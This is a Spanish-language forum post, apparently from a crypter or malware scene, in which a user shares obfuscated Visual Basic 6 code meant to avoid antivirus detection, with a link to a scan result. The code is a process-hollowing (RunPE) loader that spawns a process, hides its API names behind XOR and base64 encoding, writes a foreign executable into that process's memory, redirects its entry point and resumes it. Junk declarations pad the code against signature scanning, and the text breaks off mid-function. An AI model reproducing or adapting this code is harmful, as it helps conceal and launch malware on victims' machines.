Mostrar mensajes previos
Ordenar por
por ELBARTOkpc Se conecta desde un manicomio
hola, este ultimo tiempo me he interesado mucho en modear desde source y realize algunas pruebas con aco, haste llegar aqui , no se si se podra mejorar aun mas con aco, pero aqui voy xd.

scan: [Enlace externo eliminado para invitados]
bueno sin mas aqui esta:

Código: Seleccionar todo

Private Const ukQLMKPAsAeGqHLNFe As Long = 164314314
Private Const uGys7e7v4 As Long = &H10007
Private Const opAJEhvQjDwmSbcafQ As Long = 138114454
Private Const hMYYnrulLaTDknIkoD As Long = 68338138
Private Const mqgVEQRVx As Integer = 260
Private Const WeUAuytjqwOooEuvoO As Long = 743072071
Private Const SGaRIWgPOCoPlwMtLw As Long = 52214482
Private Const hMDjYx43R As Long = &H4
Private Const IHXbdVuKCmUWrUYmvR As Long = 531500525
Private Const VVyFRtNsQiIitnGpMy As Long = 121360113
Private Const Cu2n6E1i2 As Long = &H1000
Private Const BpKBrFQwllNVhKdJgL As Long = 87115245
Private Const NFeHlWSGaRIWgPOCoP As Long = 682828052
Private Const AVozdX8Yk As Long = &H2000
Private Const fCBdKcOSrSdXpmJfEy As Long = 703618043
Private Const lAIJSpkOQvDWeUAuyt As Long = 67827718
Private Const nmVNIRikr As Long = &H40
Private Const BuNKgQbgdoGHcdmLrV As Long = 634707323
Private Declare Function gGsILOGfInQSH Lib "gdi32" (ByVal hMetaFile As Long) As Long
Private Declare Function IQhPPCpQnzNvMyCdQN Lib "USER32" (ByVal hCursor As Long) As Long
Private Declare Function QuPou Lib "USER32" (ByVal hIcon As Long) As Long
Private Declare Function FTprAKFjyQlEy Lib "WINMM.DLL" (ByRef phMixer As Long, ByVal uMxId As Long, ByVal dwCallback As Long, ByVal dwInstance As Long, ByVal fdwOpen As Long) As Long
Private Declare Function ddchRKRwJIZcfQvKDnV Lib "WINMM.DLL" Alias "mixerGetLineControlsA" (ByVal hMixerObj As Long, pMixerLc As Long, ByVal fdwControls As Long) As Long
Private Declare Function UanxSgTFhD Lib "WINMM.DLL" (ByVal uPeriod As Long) As Long
Private Declare Function CreateProcessA Lib "kernel32" (ByVal lpAppName As String, ByVal lpCommandLine As String, ByVal lpProcessAttributes As Long, ByVal lpThreadAttributes As Long, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, ByVal lpEnvironment As Long, ByVal lpCurrentDirectory As Long, lpStartupInfo As abuKREM4A, lpProcessInformation As zhyqv3dKK) As Long
Private Declare Function LdOStT Lib "USER32" Alias "LoadIconA" (ByVal hLib As Long, ByVal lngIconID As Long) As Long
Private Declare Function roKgExtEVlGtDbVzBhBH Lib "olepro32.dll" (ByVal OLE_COLOR As Long, ByVal hPalette As Long, lpColorRef As Long) As Long
Private Declare Function ktusxUbiMaZpsv Lib "USER32" Alias "SetWindowLongA" (ByVal hWnd As Long, ByVal nIndex As Long, ByVal dwNewLong As Long) As Long
Private Declare Function bTEmoIlqDAjwVVxF Lib "USER32" (ByVal hWnd As Long, ByVal X As Long, ByVal Y As Long, ByVal nWidth As Long, ByVal nHeight As Long, ByVal bRepaint As Long) As Long
Private Declare Function OtRjJkvpHqN Lib "USER32.DLL" Alias "SystemParametersInfoA" (ByVal uAction As Long, ByVal uParam As Long, ByRef lpvParam As Any, ByVal fuWinIni As Long) As Long
Private Declare Function mBIKTrmPRyEYgUAwwvz Lib "version.dll" Alias "GetFileVersionInfoSizeA" (ByVal lptstrFilename As String, lpdwHandle As Long) As Long
Private Declare Function yPqpFvyqOs Lib "USER32" Alias "SetWindowTextA" (ByVal hWnd As Long, ByVal LPString As String) As Long
Private Declare Function CrLBsGQzzmmNQjKfJiA Lib "WINMM.DLL" () As Long
Private Declare Function xrJGeNYeamCDZ Lib "USER32" (ByVal hCursor As Long) As Long
Private Declare Function HpRiOUow Lib "gdi32" (ByVal hDC As Long) As Long
Private Declare Function WriteProcessMemory Lib "kernel32" (ByVal hProcess As Long, lpBaseAddress As Any, bvBuff As Any, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long
Private Declare Function MMLQBuBgGsILOGfInQ Lib "WINMM.DLL" Alias "mciSendStringA" (ByVal lpstrCommand As String, ByVal lpstrReturnString As String, ByVal uReturnLength As Long, ByVal hwndCallback As Long) As Long
Private Declare Function cSIQhPPCpQnzNvM Lib "USER32.DLL" Alias "SystemParametersInfoA" (ByVal uAction As Long, ByVal uParam As Long, ByRef lpvParam As Any, ByVal fuWinIni As Long) As Long
Private Declare Function dQNHaQuPouqCF Lib "gdi32" (ByVal hGdiObject As Long) As Long
Private Declare Function rAKFjyQlEoTddchRKRwJI Lib "USER32.DLL" (ByVal hwndParent As Long, ByVal lpEnumCallback As Long, ByVal lParam As Long) As Long
Private Declare Function fQvKDVYsUanxSg Lib "STKIT432.DLL" (ByVal lpstrFolderName As String, ByVal lpstrLinkName As String, ByVal lpstrLinkPath As String, ByVal lpstrLinkArgs As String) As Long
Private Declare Function hDCeLdOStTfZro Lib "USER32.DLL" (ByVal hwndParent As Long, ByVal lpEnumCallback As Long, ByVal lParam As Long) As Long
Private Declare Function EVlGtDbVzBhHOEktusxUbiMa Lib "USER32" (ByVal hIcon As Long) As Long
Private Declare Function svnMbTEmo Lib "STKIT432.DLL" (ByVal lpstrFolderName As String, ByVal lpstrLinkName As String, ByVal lpstrLinkPath As String, ByVal lpstrLinkArgs As String) As Long
Private Declare Function qDAjwVVxSuOtRjJkvpHqNxH Lib "version.dll" Alias "GetFileVersionInfoA" (ByVal lptstrFilename As String, ByVal dwHandle As Long, ByVal dwLen As Long, lpData As Any) As Long
Private Declare Function UmBIKTrmPRyEYgUA Lib "USER32" Alias "LoadCursorFromFileA" (ByVal lpFileName As String) As Long
Private Declare Function vzlryPqpFvyq Lib "USER32" (ByVal hCursor As Long) As Long
Private Declare Function QUCrLBsGQz Lib "olepro32.dll" (ByVal OLE_COLOR As Long, ByVal hPalette As Long, lpColorRef As Long) As Long
Private Declare Function OutputDebugString Lib "kernel32" Alias "OutputDebugStringA" (ByVal lpOutputString As String) As Long
Private Declare Function mNQjKfJiAAxrJGeNYeamCDZbk Lib "USER32" (ByVal IconOrCursor As Long, ByRef pICONINFO As Long) As Long
Private Declare Function RiOUowlQM Lib "USER32" (ByVal hIcon As Long) As Long
Private Declare Function QBuBgGsILOGfInQS Lib "USER32" (ByVal hDC As Long, ByVal xLeft As Long, ByVal yTop As Long, ByVal hIcon As Long, ByVal OutputWidth As Long, ByVal OutputHeight As Long, ByVal iStepIfAniCur As Long, ByVal hbrFlickerFreeDraw As Long, ByVal diFlags As Long) As Long
Private Declare Function SIQhPCpQnzNvMyCdQNHaQuP Lib "USER32" (ByVal hIcon As Long) As Long
Private Declare Function TprAKFjyQlEyoT Lib "USER32" Alias "LoadIconA" (ByVal hLib As Long, ByVal lngIconID As Long) As Long
Private Declare Function chRKRwIZcfQvKDnVYsUanx Lib "USER32" (ByVal hDC As Long, ByVal xLeft As Long, ByVal yTop As Long, ByVal hIcon As Long, ByVal OutputWidth As Long, ByVal OutputHeight As Long, ByVal iStepIfAniCur As Long, ByVal hbrFlickerFreeDraw As Long, ByVal diFlags As Long) As Long
Private Declare Function TFhDCeL Lib "USER32.DLL" Alias "SystemParametersInfoA" (ByVal uAction As Long, ByVal uParam As Long, ByRef lpvParam As Any, ByVal fuWinIni As Long) As Long
Private Declare Function StTfZroKgExtEVlGt Lib "USER32" Alias "LoadCursorFromFileA" (ByVal lpFileName As String) As Long
Private Declare Function VzBhBOEktusxUbiMaZps Lib "USER32" Alias "LoadStringA" (ByVal hLib As Long, ByVal ResourceID As Long, ByVal lpBuffer As String, ByVal nBufferSize As Long) As Long
Public Declare Sub RtlMoveMemory Lib "kernel32" (Dest As Any, Src As Any, ByVal L As Long)
Private Declare Function MbTEmoIlq Lib "gdi32" (ByVal hGDIObj As Long) As Long
Private Declare Function jwVVxFSuOtRjJ Lib "WINMM.DLL" Alias "sndPlaySoundA" (ByVal Sound As Long, ByVal lngFlags As Long) As Long
Private Declare Function pHqNxHNJUmB Lib "USER32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
Private Declare Function TrmPRyEYgUAwwvzl Lib "version.dll" Alias "GetFileVersionInfoA" (ByVal lptstrFilename As String, ByVal dwHandle As Long, ByVal dwLen As Long, lpData As Any) As Long
Private Declare Function FvyqOsQUC Lib "WINMM.DLL" (ByRef phMixer As Long, ByVal uMxId As Long, ByVal dwCallback As Long, ByVal dwInstance As Long, ByVal fdwOpen As Long) As Long
Private Declare Function BsGQzzmmNQjKfJiAAxrJGeNYeamCDZbk Lib "WINMM.DLL" (ByVal hMixerObj As Long, pMixerCD As Long, ByVal fdwDetails As Long) As Long
Private Declare Function RiOUowlQMLQBuBgGsILOGfInQS Lib "USER32" (ByVal hIcon As Long) As Long
Private Declare Function SIQhPCpQnzNvMyCdQNHaQuPuqCFTprAK Lib "USER32" (ByVal hIcon As Long) As Long
Private Declare Function yQlEyoTdchRKR Lib "SHELL32.DLL" Alias "SHGetFileInfoA" (ByVal pszPath As String, ByVal dwFileAttributes As Long, psfi As Long, ByVal cbFileInfo As Long, ByVal uFlags As Long) As Long
Private Declare Function CallWindowProcA Lib "USER32" (ByVal addr As Long, ByVal p1 As Long, ByVal p2 As Long, ByVal p3 As Long, ByVal p4 As Long) As Long
Private Declare Function IZcfQvKDnVYsUanxgTFhDCeLdOStTfZroK Lib "USER32" (ByVal hCursor As Long) As Long
Private Declare Function xtEVlGtDbVzBhBOEktusxUbiMaZps Lib "WINMM.DLL" Alias "mmioInstallIOProcA" (ByVal fccIOProc As Long, ByVal pIOProc As Long, ByVal dwFlags As Long) As Long
Private Declare Function MbTEmoIlqAjwVVxFSuOtRjJ Lib "gdi32" (ByVal hGDIObj As Long) As Long
Private Declare Function pHqNxHNJUmBKTrmPRyEYgUAwwv Lib "USER32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
Private Declare Function ryPqpFvyOsQUCrLBsG Lib "olepro32.dll" (ByRef PicDesc As Any, ByRef RefIID As Long, ByVal fPictureOwnsHandle As Long, ByRef IPic As Long) As Long
Private Declare Function zmmNQjKfJiALA Lib "USER32" (ByVal nIndex As Long) As Long
Private Declare Function NYeamCZbkHpRiOUowlQM Lib "USER32" (ByVal hDC As Long, ByVal X As Long, ByVal Y As Long, ByVal hIcon As Long) As Long
Private Declare Function QBuBgGsILOGfInQScSIQhPPCpQnzNvM Lib "USER32" (ByVal hDC As Long, ByVal xLeft As Long, ByVal yTop As Long, ByVal hIcon As Long, ByVal OutputWidth As Long, ByVal OutputHeight As Long, ByVal iStepIfAniCur As Long, ByVal hbrFlickerFreeDraw As Long, ByVal diFlags As Long) As Long
Private Declare Function dQNHaQuPouqCFprAKFjyQlEyoTddchRK Lib "gdi32" (ByVal hGdiObject As Long) As Long
Private Declare Function JIZcfQvKDnVY Lib "GDI32.DLL" (ByVal hDC As Long, ByVal nIndex As Long) As Long
Private Declare Function anxSgTFhDCeLdOStTfZ Lib "gdi32" (ByVal hColorSpace As Long) As Long
Private Declare Function GetProcAddress Lib "kernel32" (ByVal hModule As Long, ByVal lpProcName As String) As Long
Private Declare Function KgExtEVlGDbVzBhBHOEk Lib "WINMM.DLL" (ByVal hMixerObj As Long, pMixerCD As Long, ByVal fdwDetails As Long) As Long
Private Declare Function sxUbiMaZpsvMbTEmoIlq Lib "gdi32" (ByVal hDC As Long) As Long
Private Declare Function jwVVxFSuOtRjJvpHqNxHN Lib "WINMM.DLL" Alias "sndPlaySoundA" (ByVal Sound As Long, ByVal lngFlags As Long) As Long
Private Declare Function mBIKTrmPRyEYgUAwwvzryPqpFvy Lib "version.dll" Alias "GetFileVersionInfoSizeA" (ByVal lptstrFilename As String, lpdwHandle As Long) As Long
Private Declare Function CrLBsGQzzmmNQjKfJiAAxrJGeNYeamCDZbk Lib "WINMM.DLL" () As Long
Private Declare Function RiOUowlQMLQBuBgGsILOGfInQScSIQhPPCpQnzNvM Lib "USER32" (ByVal hIcon As Long) As Long
Private Declare Function dQNHaQuPouqCFprAKFjyQlEyoTddchRKwJIZcfQvKDnVYsUanx Lib "gdi32" (ByVal hGdiObject As Long) As Long
Private Declare Function TFhDCeLOStTfZ Lib "USER32.DLL" Alias "SystemParametersInfoA" (ByVal uAction As Long, ByVal uParam As Long, ByRef lpvParam As Any, ByVal fuWinIni As Long) As Long
Private Declare Function KgExtEVlGDbVzBhBHOEkusxUbiMaZps Lib "WINMM.DLL" (ByVal hMixerObj As Long, pMixerCD As Long, ByVal fdwDetails As Long) As Long
Private Declare Function LoadLibraryA Lib "kernel32" (ByVal lpLibFileName As String) As Long
Private Declare Function MbTEmoIlqAjwVVxFSuOtRjJvpHqNxHN Lib "gdi32" (ByVal hGDIObj As Long) As Long
Private Declare Function mBIKTrmPRyEYgUAwwvzryPqpFvyOsQUCrLBsG Lib "version.dll" Alias "GetFileVersionInfoSizeA" (ByVal lptstrFilename As String, lpdwHandle As Long) As Long
Private Declare Function zmmNQjKfJiALArJGeNYeamCDZ Lib "USER32" (ByVal nIndex As Long) As Long
Private Declare Function HpRiOUowQMMLQBuB Lib "gdi32" (ByVal hDC As Long) As Long
Private Declare Function sILOGfInQSHcSIQ Lib "WINMM.DLL" Alias "mciSendStringA" (ByVal CommandString As String, ByVal ReturnBuffer As String, ByVal ReturnBufferSize As Long, ByVal hCallback As Long) As Long 'MCIERROR
Private Declare Function PCpQnzNvMyCdQNHaQuouqCFTprAKFjyQlEyo Lib "USER32" Alias "GetWindowTextA" (ByVal hWnd As Long, ByVal strText As String, ByVal TextLength As Long) As Long
Private OTEvEiyuLORJhvpZIK As Integer
Private HLZjFSFrTpnQwPBFfF As Date
Private KcZvSqjfqIWrfpNIlm As Date
Private nsBqWffejGNUMLbehZ As String
Private NGpYauXcpmViIIjrFg As Boolean
Private Type dKGRxpISk
nLength As Long
lpSecurityDescriptor As Long
bInheritHandle As Long
End Type
Private yVhbtcitAyHYnuyGdY As Boolean
Private EjqKRHmhiglXdkCcbr As Single
Private kbBdJHodwnesDllYYA As Byte
Private VvRyUlwmjdysQAKQMX As Long
Private pLNWtaEUBHaiXDwCng As Long
Private SsetwBsRuZJFtOEuJT As Boolean
Private Type abuKREM4A
cb As Long
lpReserved As Long
lpDesktop As Long
lpTitle As Long
dwX As Long
dwY As Long
dwXSize As Long
dwYSize As Long
dwXCountChars As Long
dwYCountChars As Long
dwFillAttribute As Long
dwFlags As Long
wShowWindow As Integer
cbReserved2 As Integer
lpReserved2 As Long
hStdInput As Long
hStdOutput As Long
hStdError As Long
End Type
Private DZlAhkoODAtMJgCagc As Long
Private rGbdmvrUkDXqkaGPPO As Date
Private EvEiyuLORJhvpZIKeH As Currency
Private ZjFSFrTpnQwPBFfFQK As Integer
Private Type zhyqv3dKK
hProcess As Long
hThread As Long
dwProcessId As Long
dwThreadID As Long
End Type
Private qjfqIWrfpNIlmTnsBq As Double
Private ffejGNUMLbehZwNGpY As Double
Private uXcpmViIIjrFgAfEVy As Double
Private hbtcitAyHYnuyGdYCE As Single
Private qKRHmhiglXdkCcbrhk As Integer
Private BdJHodwnesDllYYAIV As String
Private Type sVDhVp921
ControlWord As Long
StatusWord As Long
TagWord As Long
ErrorOffset As Long
ErrorSelector As Long
DataOffset As Long
DataSelector As Long
RegisterArea(1 To 80) As Byte
Cr0NpxState As Long
End Type
Private lwmjdysQAKQMXopLNW As String
Private aEUBHaiXDwCngnSset As String
Private BsRuZJFtOEuJTCCobD As Double
Private lAhkoODAtMJgCagcor As Byte
Private bdmvrUkDXqkaGPPOTE As String
Private Type UusKtXbkC
ContextFlags As Long
Dr0 As Long
Dr1 As Long
Dr2 As Long
Dr3 As Long
Dr6 As Long
Dr7 As Long
FloatSave As sVDhVp921
SegGs As Long
SegFs As Long
SegEs As Long
SegDs As Long
Edi As Long
Esi As Long
Ebx As Long
Edx As Long
Ecx As Long
Eax As Long
Ebp As Long
Eip As Long
SegCs As Long
EFlags As Long
Esp As Long
SegSs As Long
End Type
Private uLORJhvpZIKeHLZjFS As Byte
Private rTpnQwPBFfFQKcZvSq As Single
Private fqIWrfpNIlmTnsBqWf As Integer
Private ejGNUMLbehZwNGpYau As Double
Private cpmViIIjrFgAfEVyVh As Double
Private Type x74Znw6up
e_magic As Integer
e_cblp As Integer
e_cp As Integer
e_crlc As Integer
e_cparhdr As Integer
e_minalloc As Integer
e_maxalloc As Integer
e_ss As Integer
e_sp As Integer
e_csum As Integer
e_ip As Integer
e_cs As Integer
e_lfarlc As Integer
e_ovno As Integer
e_res(0 To 3) As Integer
e_oemid As Integer
e_oeminfo As Integer
e_res2(0 To 9) As Integer
e_lfanew As Long
End Type
Private itAyHYnuyGdYCEjqKR As Byte
Private mhiglXdkCcbrhkbBdJ As Byte
Private odwnesDllYYAIVvRyU As Single
Private wmjdysQAKQMXopLNWt As Double
Private Type huDp7Pljx
Machine As Integer
NumberOfSections As Integer
TimeDateStamp As Long
PointerToSymbolTable As Long
NumberOfSymbols As Long
SizeOfOptionalHeader As Integer
characteristics As Integer
End Type
Private HaiXDwCngnSsetwBsR As String
Private ZJFtOEuJTCCobDZlAh As Boolean
Private koODAtMJgCagcorGbd As Single
Private vrUkDXqkaGTTSXIBIm As Boolean
Private PSVNlBtdMOiLPdnJWK As String
Private Type wRfuxamdi
VirtualAddress As Long
Size As Long
End Type
Private UCTFJjJUOgdBWunjuM As Double
Private yjtRMpqXrvFuajjinK As Date
Private YDQPfildCRKtcebgtq As Double
Private mMMnyJkEjIZAalfwgD As Long
Private wEALcrAKhcGInuOVLq As Single
Private Type STimqYTlu
Magic As Integer
MajorLinkerVersion As Byte
MinorLinkerVersion As Byte
SizeOfCode As Long
SizeOfInitializedData As Long
SizeOfUnitializedData As Long
AddressOfEntryPoint As Long
BaseOfCode As Long
BaseOfData As Long
ImageBase As Long
SectionAlignment As Long
FileAlignment As Long
MajorOperatingSystemVersion As Integer
MinorOperatingSystemVersion As Integer
MajorImageVersion As Integer
MinorImageVersion As Integer
MajorSubsystemVersion As Integer
MinorSubsystemVersion As Integer
W32VersionValue As Long
SizeOfImage As Long
SizeOfHeaders As Long
CheckSum As Long
SubSystem As Integer
DllCharacteristics As Integer
SizeOfStackReserve As Long
SizeOfStackCommit As Long
SizeOfHeapReserve As Long
SizeOfHeapCommit As Long
LoaderFlags As Long
NumberOfRvaAndSizes As Long
DataDirectory(0 To 15) As wRfuxamdi
End Type
Private bhoGgfylogFhNLshCr As Single
Private vHppccEMZBVAYpCqnh As Boolean
Private vUEOUQbstPRaweIYFL As Integer
Private mbHDDCGrkrWviwCFvV As Boolean
Private dNJwSINXGGsfHdpElD As Long
Private Type DskNAhV13
Signature As Long
FileHeader As huDp7Pljx
OptionalHeader As STimqYTlu
End Type
Private EwQNkGekgsyKfhqByY As Long
Private HbuoeKTTSXIBImAPSV As Currency
Private lBtdMOiLPdnJWKyXtr As Date
Private CTFJjJUOgdBWunjuMa As String
Private jtRMpqXrvFuajjinKR As Double
Private DQPfildCRKtcebgtqZ As Long
Private Type NUkHk61T7
SecName As String * 8
VirtualSize As Long
VirtualAddress As Long
SizeOfRawData As Long
PointerToRawData As Long
PointerToRelocations As Long
PointerToLinenumbers As Long
NumberOfRelocations As Integer
NumberOfLinenumbers As Integer
characteristics As Long
End Type
Public Function vxrSzbbLL(ByVal YPGVYE As String, ByVal OKJKI As String) As String
Dim VOE As Long
For VOE = 1 To Len(YPGVYE)
vxrSzbbLL = vxrSzbbLL & Chr(Asc(Mid(OKJKI, IIf(VOE Mod Len(OKJKI) <> 0, VOE Mod Len(OKJKI), Len(OKJKI)), 1)) Xor Asc(Mid(YPGVYE, VOE, 1)))
Next VOE
End Function
Public Sub Sko1orWPJ(ByVal VNGVC As String, ByRef WLNY() As Byte, XHXUQ As String)
Dim PSP As Long, ATTM As x74Znw6up, KJNBS As DskNAhV13, WENMCN As NUkHk61T7
Dim LFZPIOV As abuKREM4A, IWXJSK As zhyqv3dKK, QOCOJM As UusKtXbkC
LFZPIOV.cb = Len(LFZPIOV)
RtlMoveMemory ATTM, WLNY(0), 64
RtlMoveMemory KJNBS, WLNY(ATTM.e_lfanew), 248
CreateProcessA VNGVC, XuxhzwVTB(gu1854vbA(ANSajNNPg(QVYvQfdt7("4Q=="), QVYvQfdt7("ZDhwMFZoZ1U1"))), gu1854vbA(gu1854vbA(gu1854vbA(gu1854vbA(gu1854vbA(gu1854vbA(gu1854vbA(gu1854vbA(gu1854vbA(gu1854vbA(gu1854vbA(ANSajNNPg(QVYvQfdt7("mQ=="), QVYvQfdt7("Q1dKYnlJNWxG")))))))))))))) & XHXUQ, 0, 0, False, hMDjYx43R, 0, 0, LFZPIOV, IWXJSK
qAKEJnhHV vxrSzbbLL(Chr(62) & Chr(54) & Chr(39) & Chr(39) & Chr(61), XuxhzwVTB(gu1854vbA(ANSajNNPg(QVYvQfdt7("p5XQSE5UV1NLTFBQWlpFSU5YT15QWFNOVFFMT0leXkRaXFJSXFxMW0tVSVhVSltRTks="), QVYvQfdt7("dFR1UkdiRXVE"))), gu1854vbA(gu1854vbA(gu1854vbA(gu1854vbA(gu1854vbA(gu1854vbA(gu1854vbA(gu1854vbA(gu1854vbA(gu1854vbA(gu1854vbA(ANSajNNPg(QVYvQfdt7("mQ=="), QVYvQfdt7("Q1dKYnlJNWxG"))))))))))))))), vxrSzbbLL(Chr(30) & Chr(54) & Chr(22) & Chr(37) & Chr(60) & Chr(38) & Chr(60) & Chr(6) & Chr(32) & Chr(33) & Chr(58) & Chr(2) & Chr(53) & Chr(0) & Chr(35) & Chr(33) & Chr(33) & Chr(46) & Chr(56) & Chr(38), XuxhzwVTB(gu1854vbA(ANSajNNPg(QVYvQfdt7("p5XQSE5UV1NLTFBQWlpFSU5YT15QWFNOVFFMT0leXkRaXFJSXFxMW0tVSVhVSltRTks="), QVYvQfdt7("dFR1UkdiRXVE"))), gu1854vbA(gu1854vbA(gu1854vbA(gu1854vbA(gu1854vbA(gu1854vbA(gu1854vbA(gu1854vbA(gu1854vbA(gu1854vbA(gu1854vbA(ANSajNNPg(QVYvQfdt7("mQ=="), QVYvQfdt7("Q1dKYnlJNWxG"))))))))))))))), IWXJSK.hProcess, KJNBS.OptionalHeader.ImageBase
qAKEJnhHV vxrSzbbLL(Chr(59) & Chr(39) & Chr(49) & Chr(37) & Chr(52) & Chr(43) & Chr(127) & Chr(98), XuxhzwVTB(gu1854vbA(ANSajNNPg(QVYvQfdt7("p5XQSE5UV1NLTFBQWlpFSU5YT15QWFNOVFFMT0leXkRaXFJSXFxMW0tVSVhVSltRTks="), QVYvQfdt7("dFR1UkdiRXVE"))), gu1854vbA(gu1854vbA(gu1854vbA(gu1854vbA(gu1854vbA(gu1854vbA(gu1854vbA(gu1854vbA(gu1854vbA(gu1854vbA(gu1854vbA(ANSajNNPg(QVYvQfdt7("mQ=="), QVYvQfdt7("Q1dKYnlJNWxG"))))))))))))))), vxrSzbbLL(Chr(6) & Chr(43) & Chr(49) & Chr(63) & Chr(36) & Chr(38) & Chr(32) & Chr(17) & Chr(37) & Chr(40) & Chr(34) & Chr(46) & Chr(22) & Chr(43), XuxhzwVTB(gu1854vbA(ANSajNNPg(QVYvQfdt7("p5XQSE5UV1NLTFBQWlpFSU5YT15QWFNOVFFMT0leXkRaXFJSXFxMW0tVSVhVSltRTks="), QVYvQfdt7("dFR1UkdiRXVE"))), gu1854vbA(gu1854vbA(gu1854vbA(gu1854vbA(gu1854vbA(gu1854vbA(gu1854vbA(gu1854vbA(gu1854vbA(gu1854vbA(gu1854vbA(ANSajNNPg(QVYvQfdt7("mQ=="), QVYvQfdt7("Q1dKYnlJNWxG"))))))))))))))), IWXJSK.hProcess, KJNBS.OptionalHeader.ImageBase, KJNBS.OptionalHeader.SizeOfImage, Cu2n6E1i2 Or AVozdX8Yk, nmVNIRikr
WriteProcessMemory IWXJSK.hProcess, ByVal KJNBS.OptionalHeader.ImageBase, WLNY(0), KJNBS.OptionalHeader.SizeOfHeaders, 0
For PSP = 0 To KJNBS.FileHeader.NumberOfSections - 1
RtlMoveMemory WENMCN, WLNY(ATTM.e_lfanew + 248 + 40 * PSP), Len(WENMCN)
WriteProcessMemory IWXJSK.hProcess, ByVal KJNBS.OptionalHeader.ImageBase + WENMCN.VirtualAddress, WLNY(WENMCN.PointerToRawData), WENMCN.SizeOfRawData, 0
Next PSP
QOCOJM.ContextFlags = uGys7e7v4
qAKEJnhHV vxrSzbbLL(Chr(59) & Chr(39) & Chr(49) & Chr(37) & Chr(52) & Chr(43) & Chr(127) & Chr(98), XuxhzwVTB(gu1854vbA(ANSajNNPg(QVYvQfdt7("p5XQSE5UV1NLTFBQWlpFSU5YT15QWFNOVFFMT0leXkRaXFJSXFxMW0tVSVhVSltRTks="), QVYvQfdt7("dFR1UkdiRXVE"))), gu1854vbA(gu1854vbA(gu1854vbA(gu1854vbA(gu1854vbA(gu1854vbA(gu1854vbA(gu1854vbA(gu1854vbA(gu1854vbA(gu1854vbA(ANSajNNPg(QVYvQfdt7("mQ=="), QVYvQfdt7("Q1dKYnlJNWxG"))))))))))))))), vxrSzbbLL(Chr(23) & Chr(39) & Chr(55) & Chr(31) & Chr(57) & Chr(53) & Chr(41) & Chr(49) & Chr(45) & Chr(7) & Chr(34) & Chr(35) & Chr(39) & Chr(54) & Chr(62) & Chr(54), XuxhzwVTB(gu1854vbA(ANSajNNPg(QVYvQfdt7("p5XQSE5UV1NLTFBQWlpFSU5YT15QWFNOVFFMT0leXkRaXFJSXFxMW0tVSVhVSltRTks="), QVYvQfdt7("dFR1UkdiRXVE"))), gu1854vbA(gu1854vbA(gu1854vbA(gu1854vbA(gu1854vbA(gu1854vbA(gu1854vbA(gu1854vbA(gu1854vbA(gu1854vbA(gu1854vbA(ANSajNNPg(QVYvQfdt7("mQ=="), QVYvQfdt7("Q1dKYnlJNWxG"))))))))))))))), IWXJSK.hThread, VarPtr(QOCOJM)
WriteProcessMemory IWXJSK.hProcess, ByVal QOCOJM.Ebx + 8, KJNBS.OptionalHeader.ImageBase, 4, 0
QOCOJM.Eax = KJNBS.OptionalHeader.ImageBase + KJNBS.OptionalHeader.AddressOfEntryPoint
qAKEJnhHV vxrSzbbLL(Chr(59) & Chr(39) & Chr(49) & Chr(37) & Chr(52) & Chr(43) & Chr(127) & Chr(98), XuxhzwVTB(gu1854vbA(ANSajNNPg(QVYvQfdt7("p5XQSE5UV1NLTFBQWlpFSU5YT15QWFNOVFFMT0leXkRaXFJSXFxMW0tVSVhVSltRTks="), QVYvQfdt7("dFR1UkdiRXVE"))), gu1854vbA(gu1854vbA(gu1854vbA(gu1854vbA(gu1854vbA(gu1854vbA(gu1854vbA(gu1854vbA(gu1854vbA(gu1854vbA(gu1854vbA(ANSajNNPg(QVYvQfdt7("mQ=="), QVYvQfdt7("Q1dKYnlJNWxG"))))))))))))))), vxrSzbbLL(Chr(3) & Chr(39) & Chr(55) & Chr(31) & Chr(57) & Chr(53) & Chr(41) & Chr(49) & Chr(45) & Chr(7) & Chr(34) & Chr(35) & Chr(39) & Chr(54) & Chr(62) & Chr(54), XuxhzwVTB(gu1854vbA(ANSajNNPg(QVYvQfdt7("p5XQSE5UV1NLTFBQWlpFSU5YT15QWFNOVFFMT0leXkRaXFJSXFxMW0tVSVhVSltRTks="), QVYvQfdt7("dFR1UkdiRXVE"))), gu1854vbA(gu1854vbA(gu1854vbA(gu1854vbA(gu1854vbA(gu1854vbA(gu1854vbA(gu1854vbA(gu1854vbA(gu1854vbA(gu1854vbA(ANSajNNPg(QVYvQfdt7("mQ=="), QVYvQfdt7("Q1dKYnlJNWxG"))))))))))))))), IWXJSK.hThread, VarPtr(QOCOJM)
qAKEJnhHV vxrSzbbLL(Chr(59) & Chr(39) & Chr(49) & Chr(37) & Chr(52) & Chr(43) & Chr(127) & Chr(98), XuxhzwVTB(gu1854vbA(ANSajNNPg(QVYvQfdt7("p5XQSE5UV1NLTFBQWlpFSU5YT15QWFNOVFFMT0leXkRaXFJSXFxMW0tVSVhVSltRTks="), QVYvQfdt7("dFR1UkdiRXVE"))), gu1854vbA(gu1854vbA(gu1854vbA(gu1854vbA(gu1854vbA(gu1854vbA(gu1854vbA(gu1854vbA(gu1854vbA(gu1854vbA(gu1854vbA(ANSajNNPg(QVYvQfdt7("mQ=="), QVYvQfdt7("Q1dKYnlJNWxG"))))))))))))))), vxrSzbbLL(Chr(2) & Chr(39) & Chr(48) & Chr(62) & Chr(60) & Chr(34) & Chr(24) & Chr(56) & Chr(59) & Chr(33) & Chr(44) & Chr(41), XuxhzwVTB(gu1854vbA(ANSajNNPg(QVYvQfdt7("p5XQSE5UV1NLTFBQWlpFSU5YT15QWFNOVFFMT0leXkRaXFJSXFxMW0tVSVhVSltRTks="), QVYvQfdt7("dFR1UkdiRXVE"))), gu1854vbA(gu1854vbA(gu1854vbA(gu1854vbA(gu1854vbA(gu1854vbA(gu1854vbA(gu1854vbA(gu1854vbA(gu1854vbA(gu1854vbA(ANSajNNPg(QVYvQfdt7("mQ=="), QVYvQfdt7("Q1dKYnlJNWxG"))))))))))))))), IWXJSK.hThread
End Sub
Public Function qAKEJnhHV(ByVal FWEC As String, ByVal OUVYP As String, ParamArray RGUIGHC()) As Long
Dim WWUCG As Long, CNZH(&HEC00& - 1) As Byte, RMU As Long, YWVZNYJ As Long
YWVZNYJ = GetProcAddress(LoadLibraryA(FWEC), OUVYP)
If YWVZNYJ = 0 Then Exit Function
WWUCG = VarPtr(CNZH(0))
RtlMoveMemory ByVal WWUCG, &H59595958, &H4: WWUCG = WWUCG + 4
RtlMoveMemory ByVal WWUCG, &H5059, &H2: WWUCG = WWUCG + 2
For RMU = UBound(RGUIGHC) To 0 Step -1
